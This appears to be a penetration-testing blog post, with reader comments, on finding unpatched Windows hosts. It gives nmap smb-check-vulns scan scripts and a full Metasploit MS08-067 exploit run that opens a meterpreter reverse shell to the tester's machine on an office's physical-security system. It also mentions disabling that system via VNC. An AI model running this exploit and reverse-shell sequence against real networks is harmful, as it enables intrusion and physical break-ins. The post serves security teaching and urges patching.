While I was waiting for my brute force attack against the PDC to complete, I needed to find another way in that wasn't going to take forever. So, while that was running, I used the NSE 'smb-check-vulns' script to see if there were any systems on the network that the admin had neglected to patch. The script probes port 445 for MS08-067 and a handful of other SMB bugs; some of those checks can crash an unpatched host, so read the script's documentation before pointing it at production boxes.

nmap -p445 --script=smb-check-vulns 192.168.0.*|perl -le 'while(<>){
if(/^.*?\((\d+\.\d+\.\d+\.\d+)\):$/) { $i = $1; } if(/^\|\_\s+(.*?)\:\s+VULNERABLE$/ && $i ne "")
{ print "$i is vulnerable to $1"; }}'

192.168.0.5 is vulnerable to MS08-067
192.168.0.7 is vulnerable to MS08-067
192.168.0.11 is vulnerable to MS08-067

Uhoh.. :-)

Through the research that I’ve done, I know that .5 is a file server, .7 is just a regular workstation, and .11 is actually the security system for their office.. like, it controls the physical access to the building. Not good.
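The one-liner above scrapes nmap's human-readable output, and the host header it keys on changes with reverse DNS results and between nmap versions. As an added example (not from the original post), here is a Python version that reads nmap's XML output instead, i.e. the file written by `nmap -p445 --script=smb-check-vulns -oX scan.xml 192.168.0.0/24`. The XML embedded below is a constructed sample of that format, not a real scan, and the filename `scan.xml` is assumed.

```python
"""Parse nmap's XML output for smb-check-vulns findings.

Added example, not from the original post: instead of regexing the
human-readable scan output, read the XML that
`nmap -p445 --script=smb-check-vulns -oX scan.xml 192.168.0.0/24` writes,
which does not change shape with reverse-DNS results or nmap version.
"""
import ipaddress
import re
import sys
import xml.etree.ElementTree as ET

# One check per line in the script's output; a line is a finding only if the
# verdict after the colon starts with VULNERABLE, so "NOT VULNERABLE",
# "Likely CLEAN" and "ERROR: ..." lines are ignored.
VULN_RE = re.compile(r"^\s*(?P<check>[^:]+):\s+VULNERABLE\b")


def vulnerable_hosts(xml_text):
    """Return {ip: [check names reported VULNERABLE]} from nmap -oX text."""
    findings = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        # Hosts with 445 closed never run the host script, so no <hostscript>.
        for script in host.iterfind("hostscript/script[@id='smb-check-vulns']"):
            for line in script.get("output", "").splitlines():
                m = VULN_RE.match(line)
                if m:
                    findings.setdefault(ip, []).append(m.group("check").strip())
    return findings


def report_lines(findings):
    """Render findings in the post's '<ip> is vulnerable to <check>' form, ordered by address."""
    lines = []
    for ip in sorted(findings, key=ipaddress.ip_address):
        for check in findings[ip]:
            lines.append(f"{ip} is vulnerable to {check}")
    return lines


# Constructed sample of nmap -oX output (not a real scan): one patched host,
# one with 445 closed, and two vulnerable ones. Newlines inside the output
# attribute are written as &#10;, as nmap does, because XML parsers fold
# literal newlines in attribute values to spaces.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -p445 --script=smb-check-vulns -oX scan.xml 192.168.0.0/24">
<host><status state="up"/><address addr="192.168.0.5" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript><script id="smb-check-vulns" output="&#10;  MS08-067: VULNERABLE&#10;  Conficker: Likely CLEAN&#10;  regsvc DoS: NOT VULNERABLE"/></hostscript>
</host>
<host><status state="up"/><address addr="192.168.0.6" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript><script id="smb-check-vulns" output="&#10;  MS08-067: NOT VULNERABLE&#10;  Conficker: Likely CLEAN"/></hostscript>
</host>
<host><status state="up"/><address addr="192.168.0.7" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="closed"/></port></ports>
</host>
<host><status state="up"/><address addr="192.168.0.11" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript><script id="smb-check-vulns" output="&#10;  MS08-067: VULNERABLE&#10;  SMBv2 DoS (CVE-2009-3103): VULNERABLE&#10;  Conficker: Likely CLEAN"/></hostscript>
</host>
</nmaprun>
"""

if __name__ == "__main__":
    # Usage: python smbvulns.py scan.xml   (no argument: parse the built-in sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    found = vulnerable_hosts(text)
    print("\n".join(report_lines(found)) if found else "No vulnerable hosts found")
```

Keying on the `addrtype="ipv4"` address element and the `id` of the host script means the same code works whether or not a host has a PTR record, and a host whose 445 is closed simply produces no `<hostscript>` and is skipped rather than mis-attributed to the previous host.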

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.11
RHOST => 192.168.0.11
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(ms08_067_netapi) > exploit

.....
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.11:1251)
meterpreter > pwd
C:\WINNT\system32

The whole process took less than a minute. From here, if I were actually attacking this network instead of just pen testing, I would inject a VNC DLL (Metasploit's vncinject payload) and get remote access to the desktop, allowing me to literally control physical access to their office, i.e. just turn off the security system so I could walk right into the building after hours without having to use a pesky fob.

Patch your systems, people. Windows automatic update is your friend.

  1. Matt says:

    I took that one-liner and actually scripted it for ease of use.


    #!/usr/bin/perl
    # Scan the /24 of the given interface with nmap's smb-check-vulns script
    # and print every host/check that comes back VULNERABLE.
    use strict;
    use warnings;

    my $eth = $ARGV[0];

    # Interface name only; nothing shell-special gets near the backticks below.
    if(!defined $eth || $eth !~ /^[\w.:-]+$/) {
        print "Usage: smb-check.pl eth<#>\n";
        exit(0);
    }

    my @ifconfig = `ifconfig $eth`;
    my $range;

    foreach my $line (@ifconfig) {
        # Old ifconfig prints "inet addr:192.168.0.100", newer prints "inet 192.168.0.100".
        if($line =~ /inet\s+(?:addr:)?(\d+\.\d+\.\d+)\.\d+/) {
            $range = $1;
        }
    }

    die "No IPv4 address found on $eth\n" unless defined $range;

    open(NMAP, "nmap -p445 --script=smb-check-vulns $range.*|") || die "$!";
    my ($i, $vuln) = ("", 0);
    while(<NMAP>) {
        # Host header: "Interesting ports on host (1.2.3.4):", "Interesting ports on 1.2.3.4:"
        # (no PTR record) or, on newer nmap, "Nmap scan report for ..."
        if(/^(?:Interesting ports on|Nmap scan report for)\b.*?(\d+\.\d+\.\d+\.\d+)\)?:?\s*$/) {
            $i = $1;
        }
        if(/^\|\_\s+(.*?)\:\s+VULNERABLE$/ && $i ne "") {
            print "$i is vulnerable to $1\n";
            $vuln++;
        }
    }
    close(NMAP);

    if($vuln == 0) {
        print "No vulnerable hosts found\n";
        exit(0);
    }

  2. Joaquin says:

    Matt,

    Once again, thanks for the post. While I’ve used Nmap extensively, I haven’t made it a priority to learn the advanced features, such as the NSE. You’ve definitely provided me with the incentive to reprioritize and order Fyodor’s book already. Great info, short and to the point. Keep up the good work.

  3. Matt says:

    @Joaquin: Thanks for the comment.. yeah, nmap’s NSE is sweet.. I definitely recommend playing with it. :-)
